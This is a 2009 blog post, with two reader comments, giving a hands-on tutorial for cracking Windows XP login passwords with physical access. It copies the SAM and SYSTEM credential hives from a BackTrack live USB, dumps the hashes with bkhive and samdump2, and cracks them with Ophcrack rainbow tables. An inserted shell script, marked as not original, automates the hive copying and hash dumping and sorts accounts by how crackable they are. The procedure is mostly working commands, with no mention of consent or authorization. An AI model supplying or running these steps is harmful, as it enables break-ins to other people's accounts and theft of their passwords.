Saturday, 11 April 2009

Cracking Windows login passwords

All of this is old news, but still new and fascinating to me ;) hence the detailed post!

The scenario: you have physical access to a Windows machine but cannot log in, and you want the account names and passwords.
(For the two-stage version below you also need a second PC to do the cracking on ;) )

The tools used were:
* BackTrack 3 Final live USB
* Ophcrack (using the 'XP special' rainbow tables)

The hack/crack depends on having physical access to the machine in question, and assumes it is running Windows XP (which by default still stores the LM hash that the XP rainbow tables target).
Basically the sequence of events is as follows -->
* Boot up with the BackTrack live USB/CD;
* Copy the SAM hive (the account hashes) and the SYSTEM hive (which holds the boot key needed to decrypt them) from the Windows system;
* Extract the hashes from the SAM file;
* Crack the hashes using Ophcrack

After booting up BT3 and opening a shell, type 'df' to see which drives are mounted ('fdisk -l' lists the partitions if the Windows one has not been mounted yet):

In this case sda1 and sda2 are on the laptop, and the sda2 partition has Windows on it.
sdb1 is my flash drive running BT3 and sdc is my extra flash drive for saving the password hashes, as I will crack these on my other PC.

Now head over to the directory on the Windows partition holding the files we need, the SAM file and the SYSTEM file. Linux paths are case sensitive, so use 'ls' to check the exact spelling of WINDOWS, system32 and the hive names on your install:
cd /mnt/sda2/WINDOWS/system32/config/

Now copy the SAM and SYSTEM files to the flash drive:
cp SAM /mnt/sdc/
cp SYSTEM /mnt/sdc/

Now that we have the files we need, switch to the folder they were copied to and use 'bkhive' to pull the syskey boot key out of the SYSTEM hive; samdump2 needs this key to decrypt the hashes in the SAM file. The file names must match what you copied (a FAT formatted flash drive ignores case, but an ext filesystem will not):
cd /mnt/sdc/
bkhive SYSTEM key

Now samdump2 can use the key to decrypt and dump the hashes from the SAM file:
samdump2 SAM key
To save the hashes to a text file for cracking later:
samdump2 SAM key > /mnt/sdc/hashes.txt
(Newer samdump2 releases, 3.x and later, read the SYSTEM hive themselves, so there the command is 'samdump2 SYSTEM SAM' and the bkhive step is not needed.)

So now we have a list of users and the hashes for their passwords in 'hashes.txt', one line per account in pwdump format: username:RID:LM hash:NT hash:::. An LM hash of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored for that account (LM storage disabled or the password is longer than 14 characters), and an NT hash of 31d6cfe0d16ae931b73c59d7e0c089c0 means the password is blank; both are worth spotting before feeding the file to Ophcrack.
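The extraction above, plus a triage pass over the resulting hashes.txt, as an added shell example that is not from the original post. dump_hashes wraps the cp/bkhive/samdump2 steps with the same BT3 tool names and arguments used above; the Windows mount point and the output directory are parameters, and the hive files are located case-insensitively so SAM/sam and SYSTEM/system both work. triage_hashes reads the pwdump-format lines samdump2 writes and says, per account, whether the XP (LM) tables can hit it at all. The account lines embedded under SAMPLE are constructed sample data, not a dump from a real machine; run the script with no arguments to triage that sample, or with a mount point and output directory to do the real extraction.

```shell
#!/bin/sh
# Added example, not from the original post. Two parts:
#   dump_hashes MOUNTPOINT OUTDIR  - copy the SAM and SYSTEM hives, run bkhive + samdump2
#   triage_hashes FILE             - classify each pwdump line before burning hours on tables
# The SAMPLE account lines below are constructed for this demo, not dumped from a real box.

EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM hash of "": LM storage off or password > 14 chars
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of "": blank password

# find_hive DIR NAME -> path of the hive regardless of the case it was written with
find_hive() {
    find "$1" -maxdepth 1 -iname "$2" | head -n 1
}

# dump_hashes /mnt/sda2 /mnt/sdc  (assumes the Windows partition is already mounted)
dump_hashes() {
    cfg="$1/WINDOWS/system32/config"
    sam=$(find_hive "$cfg" SAM)
    sys=$(find_hive "$cfg" SYSTEM)
    [ -n "$sam" ] && [ -n "$sys" ] || { echo "no SAM/SYSTEM hive under $cfg" >&2; return 1; }
    cp "$sam" "$2/SAM" && cp "$sys" "$2/SYSTEM" || return 1
    bkhive "$2/SYSTEM" "$2/key" || return 1        # syskey boot key from the SYSTEM hive
    samdump2 "$2/SAM" "$2/key" > "$2/hashes.txt"   # pwdump lines: user:rid:lmhash:nthash:::
}

# classify_line 'user:rid:lm:nt:::' -> blank | lm | nt-only | malformed
classify_line() {
    lm=$(printf '%s\n' "$1" | cut -d: -f3 | tr 'A-F' 'a-f')
    nt=$(printf '%s\n' "$1" | cut -d: -f4 | tr 'A-F' 'a-f')
    if [ "${#lm}" -ne 32 ] || [ "${#nt}" -ne 32 ]; then
        echo malformed; return 1
    elif [ "$nt" = "$EMPTY_NT" ]; then
        echo blank        # nothing to crack: the password is empty
    elif [ "$lm" = "$EMPTY_LM" ]; then
        echo nt-only      # only an NT hash: XP (LM) tables will never hit it, use NT tables
    else
        echo lm           # LM hash present: the XP free/special tables apply
    fi
}

# triage_hashes FILE -> one "user rid class" line per account
triage_hashes() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        user=$(printf '%s\n' "$line" | cut -d: -f1)
        rid=$(printf '%s\n' "$line" | cut -d: -f2)
        printf '%s %s %s\n' "$user" "$rid" "$(classify_line "$line")"
    done < "$1"
}

# count_class FILE CLASS -> number of accounts in that class
count_class() {
    triage_hashes "$1" | awk -v c="$2" '$3 == c' | wc -l | tr -d ' '
}

# Constructed sample: Administrator has the LM/NT hashes of "password", Guest is blank,
# HelpAssistant has an arbitrary NT hash and no LM hash (password longer than 14 chars).
SAMPLE=${TMPDIR:-/tmp}/hashes.sample.txt
cat > "$SAMPLE" <<'EOF'
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
EOF

if [ "$#" -ge 2 ]; then
    dump_hashes "$1" "$2" && triage_hashes "$2/hashes.txt"
else
    triage_hashes "$SAMPLE"
fi
```

Only the 'lm' accounts are worth the 7 GB XP special tables; 'nt-only' accounts need the NT (Vista) tables, and 'blank' accounts need nothing at all.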

Stage 2.. cracking the hashes with Ophcrack..

Ophcrack is a free Windows password cracker that uses rainbow tables (pre-computed hash chains that trade disk space for cracking time). It can also be run from a live CD, but I found the installed program a better fit for my purpose.

There are a couple of free rainbow tables available for download; these will normally grab the easy passwords, but I had the most success with the 'XP special' tables.
They cover a larger character set, so they obviously take longer to crunch through, but the results are fantastic. One thing to keep in mind: the XP tables crack the LM hash, which XP stores by default for passwords of 14 characters or fewer and which is case insensitive (Ophcrack then tries the case combinations against the NT hash to recover the exact password). An account whose LM hash is the empty value aad3b435b51404eeaad3b435b51404ee has only an NT hash, and for that you need the Vista/NT tables instead.

So, assuming Ophcrack is installed on your system and that you have downloaded at least the 'XP free small' and 'XP free fast' tables:

Fire up Ophcrack, click on the 'Tables' icon and install the tables by browsing to the directory where they are located. Click OK and the screen should look something like the screenshot below.

Next click on the 'Load' icon, choose 'PWDUMP file' and browse to the 'hashes.txt' file made in the previous step with BT3.

Then click on the 'Crack' icon and let Ophcrack do its thing!
It is a CPU intensive process and took my lowly PC over 4 min to complete,
without success using the XP free fast tables.

Using the XP special tables takes a lot longer, but with MUCH better results:

So there you have it; the longest part of doing the above will be downloading the tools and tables ;)

An optimized way to do the above is to get an 8 GB thumb drive (the XP special tables are over 7 GB, whereas the tables included on the Ophcrack live CD are under 400 MB and cover far fewer possible passwords), make it a bootable Ophcrack USB drive and replace the tables in the Ophcrack/tables directory with the XP special tables.
Doing this enabled me to do the above in one step: boot the target machine from the Ophcrack live USB and carry out the Windows password cracks directly.
This reduced the time needed for the above to under 11 min!
(This is in no small part due to the amount of RAM: my desktop only has 2 GB whereas my laptop has 3 GB, and the more the merrier!)


Well, goes to show that research is still your best friend!

There is an Ophcrack module, ophcrack-3.0.lzm, which can be downloaded from the great French blog and then placed in your BackTrack 3 modules folder.

This way, if you have a large flash drive, you can boot into BT3, run the Ophcrack module, point it at your rainbow tables, and off you go!

Assuming you have downloaded the above Ophcrack module and placed it correctly in your modules folder, proceed as follows:

> Boot up in BT3F
> Open a shell and type 'ophcrack' with no arguments to see its options;

Then run:
ophcrack -g -d /mnt/sdb1/OPHcrack/ -t /mnt/sdb1/OPHcrack/XP_Special/ -w /mnt/sda2/WINDOWS/system32/config/
(-g runs without the GUI, -d is the base directory for the tables, -t the tables to use and -w the Windows config directory holding SAM and SYSTEM, so Ophcrack reads the hives itself and the bkhive/samdump2 step is not needed. In my case the tables are in a folder called OPHcrack on the USB drive BT is running from, and Windows is on sda2; adjust the paths to your own layout and remember that they are case sensitive!)

So as you can see, the whole cracking process took about 19 minutes to chunk through around 7 GB worth of tables.
Not bad!


  1. The linked site (which I was also linked to from elsewhere) does not appear to be hosting the file anymore; would it be possible for you to host it for us?

  2. Ophcrack works out of the box in BackTrack 4,
    so I would upgrade to BackTrack 4 and give Ophcrack a whirl.

